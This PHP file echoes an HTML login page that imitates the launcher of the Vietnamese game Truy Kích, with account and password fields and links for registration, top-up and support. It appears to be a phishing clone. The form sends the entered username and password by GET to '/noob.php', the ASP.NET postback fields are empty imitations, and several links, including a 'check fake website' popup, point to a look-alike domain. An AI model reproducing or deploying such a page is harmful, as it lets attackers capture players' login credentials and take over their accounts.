<?php
echo "\n"; 
echo "<html xmlns=\"http://www.w3.org/1999/xhtml\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n"; 
echo "    \n"; 
echo "    <title>Truy Kích</title>\n"; 
echo "    <link href=\"css/style.css\" rel=\"stylesheet\" type=\"text/css\">\n"; 
echo "    <link href=\"css/colorbox.css\" rel=\"stylesheet\" type=\"text/css\">\n"; 
echo "    <link rel=\"shortcut icon\" href=\"\" type=\"image/x-icon\">\n"; 
echo "    \n"; 
echo "    <meta name=\"rating\" content=\"general\">\n"; 
echo "    <meta name=\"author\" content=\"TH\">\n"; 
echo "    <meta name=\"copyright\" content=\"Truy Kích\">\n"; 
echo "    <meta name=\"expires\" content=\"never\">\n"; 
echo "    <meta name=\"distribution\" content=\"global\">\n"; 
echo "    <meta name=\"RESOURCE-TYPE\" content=\"DOCUMENT\">\n"; 
echo "    <meta name=\"GENERATOR\" content=\"Truy Kích\">\n"; 
echo "    <meta name=\"googlebot\" content=\"INDEX,FOLLOW,ARCHIVE\">\n"; 
echo "    <meta name=\"robots\" content=\"INDEX,FOLLOW,ARCHIVE\">\n"; 
echo "    <meta name=\"description\" content=\"Truy Kích\">\n"; 
echo "    <meta name=\"keywords\" content=\"Truy Kích\">\n"; 
echo "    <script type=\"text/javascript\" src=\"js/jquery-1.7.1.min.js\"></script>\n"; 
echo "    <script type=\"text/javascript\" src=\"js/jquery.colorbox-min.js\"></script>\n"; 
echo "</head>\n"; 
echo "<body><div id=\"cboxOverlay\" style=\"display: none;\"></div><div id=\"colorbox\" class=\"\" style=\"padding-bottom: 0px; padding-right: 0px; display: none;\"><div id=\"cboxWrapper\"><div><div id=\"cboxTopLeft\" style=\"float: left;\"></div><div id=\"cboxTopCenter\" style=\"float: left;\"></div><div id=\"cboxTopRight\" style=\"float: left;\"></div></div><div style=\"clear: left;\"><div id=\"cboxMiddleLeft\" style=\"float: left;\"></div><div id=\"cboxContent\" style=\"float: left;\"><div id=\"cboxLoadedContent\" style=\"width: 0px; height: 0px; overflow: hidden; float: left;\"></div><div id=\"cboxLoadingOverlay\" style=\"float: left;\"></div><div id=\"cboxLoadingGraphic\" style=\"float: left;\"></div><div id=\"cboxTitle\" style=\"float: left;\"></div><div id=\"cboxCurrent\" style=\"float: left;\"></div><div id=\"cboxNext\" style=\"float: left;\"></div><div id=\"cboxPrevious\" style=\"float: left;\"></div><div id=\"cboxSlideshow\" style=\"float: left;\"></div><div id=\"cboxClose\" style=\"float: left;\"></div></div><div id=\"cboxMiddleRight\" style=\"float: left;\"></div></div><div style=\"clear: left;\"><div id=\"cboxBottomLeft\" style=\"float: left;\"></div><div id=\"cboxBottomCenter\" style=\"float: left;\"></div><div id=\"cboxBottomRight\" style=\"float: left;\"></div></div></div><div style=\"position: absolute; width: 9999px; visibility: hidden; display: none;\"></div></div>\n"; 
echo "    <form name=\"frMain\" method=\"get\" action=\"/noob.php\" onkeypress=\"javascript:return WebForm_FireDefaultButton(event, &#39;btnLogin&#39;)\" id=\"frMain\">\n"; 
echo "<div>\n"; 
echo "<input type=\"hidden\" name=\"__EVENTTARGET\" id=\"__EVENTTARGET\" value=\"\">\n"; 
echo "<input type=\"hidden\" name=\"__EVENTARGUMENT\" id=\"__EVENTARGUMENT\" value=\"\">\n"; 
echo "<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=\"\">\n"; 
echo "</div>\n"; 
echo "\n"; 
echo "<script type=\"text/javascript\">\n"; 
echo "//<![CDATA[\n"; 
echo "var theForm = document.forms['frMain'];\n"; 
echo "if (!theForm) {\n"; 
echo "    theForm = document.frMain;\n"; 
echo "}\n"; 
echo "function __doPostBack(eventTarget, eventArgument) {\n"; 
echo "    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\n"; 
echo "        theForm.__EVENTTARGET.value = eventTarget;\n"; 
echo "        theForm.__EVENTARGUMENT.value = eventArgument;\n"; 
echo "        theForm.submit();\n"; 
echo "    }\n"; 
echo "}\n"; 
echo "//]]>\n"; 
echo "</script>\n"; 
echo "\n"; 
echo "\n"; 
echo "\n"; 
echo "\n"; 
echo "<div>\n"; 
echo "\n"; 
echo "	<input type=\"hidden\" name=\"__VIEWSTATEGENERATOR\" id=\"__VIEWSTATEGENERATOR\" value=\"\">\n"; 
echo "	<input type=\"hidden\" name=\"__EVENTVALIDATION\" id=\"__EVENTVALIDATION\" value=\"/p\">\n"; 
echo "</div>\n"; 
echo "        <div class=\"launcher\">\n"; 
echo "            <div class=\"launcher_block\">\n"; 
echo "                <div class=\"launcher_right\">\n"; 
echo "                    <ul>\n"; 
echo "                        <li><a href=\"javascript:;\" id=\"linkCheckDomain\" class=\"l_bt cboxElement\">Kiểm tra website\n"; 
echo "                            <br>\n"; 
echo "                            giả mạo</a></li>\n"; 
echo "                        <li><a target=\"_blank\" href=\"https://www.facebook.com/truykich.vn\" class=\"l_bt\">Fanpage\n"; 
echo "                            <br>\n"; 
echo "                            Chính thức</a></li>\n"; 
echo "                        <li><a target=\"_blank\" href=\"http://sukien.truykich.vn/\">Sự kiện</a></li>\n"; 
echo "                        <li><a target=\"_blank\" href=\"http://hotro.scoin.vn/\">Hỡ trợ</a></li>\n"; 
echo "                        <div style=\"clear: both\"></div>\n"; 
echo "                    </ul>\n"; 
echo "                    <div style=\"clear: both\"></div>\n"; 
echo "                </div>\n"; 
echo "                <!--end launcher_right-->\n"; 
echo "                <div class=\"launcher_left\">\n"; 
echo "                    <div class=\"tit_lau\">\n"; 
echo "                        <img src=\"css/text_dnhap.png\" width=\"154\" height=\"25\">\n"; 
echo "                    </div>\n"; 
echo "                    <div class=\"lau_box\">\n"; 
echo "                        <a id=\"btnLogin\" href=\"javascript:__doPostBack('btnLogin','')\"><img src=\"css/bt_choingay.png\" width=\"125\" height=\"63\"></a>\n"; 
echo "                        <ul>\n"; 
echo "                            <li style=\"margin-bottom: 3px !important;\"><span>Tài khoản</span><input name=\"txtUserName\" type=\"text\" id=\"txtUserName\"></li>\n"; 
echo "                            <li><span>Mật khẩu</span><input name=\"txtPassword\" type=\"password\" id=\"txtPassword\"></li>\n"; 
echo "                        </ul>\n"; 
echo "                        <div style=\"clear: both\"></div>\n"; 
echo "                    </div>\n"; 
echo "                    <!--end lau_box-->\n"; 
echo "                    <p class=\"noti\">\n"; 
echo "                        </p>\n"; 
echo "                    <ul class=\"bt_laucher\">\n"; 
echo "                        <li><a href=\"http://truykich.net.vn/\">Quên mật khẩu</a></li>\n"; 
echo "                        <li><a href=\"http://client.graph.vtcmobile.vn/oauth/RegisterLaucher.aspx?sid=330051&ud=ivANOkNxHPGZzm8PpAPRH2st47VNrqx3RInaJSAxHZ8jk62v6%2bCWQY%2bFY%2bsgfgdMblQSEbJdLbBfo17Y0ewBtFE6LRUAxbGi\">Đăng ký nhanh</a></li>\n"; 
echo "                        <li><a href=\"http://truykich.net.vn/nap-the\">Nạp thẻ</a></li>\n"; 
echo "                    </ul>\n"; 
echo "                    <div style=\"clear: both\"></div>\n"; 
echo "                </div>\n"; 
echo "                <!--end launcher_left-->\n"; 
echo "                <div style=\"clear: both\"></div>\n"; 
echo "            </div>\n"; 
echo "            <!--end launcher_block-->\n"; 
echo "            <div style=\"clear: both\"></div>\n"; 
echo "        </div>\n"; 
echo "        <!--end launcher-->\n"; 
echo "    \n"; 
echo "\n"; 
echo "</form>\n"; 
echo "    <script type=\"text/javascript\">var _popup = 0;\n"; 
echo "        $(function () {\n"; 
echo "            $('#linkCheckDomain').colorbox({ width: \"480\", height: \"290\", iframe: true, href: \"http://truykich.net.vn/checkdomain.aspx\" });\n"; 
echo "        });\n"; 
echo "    </script>\n"; 
echo "\n"; 
echo "\n"; 
echo "</body></html>\n";
?>
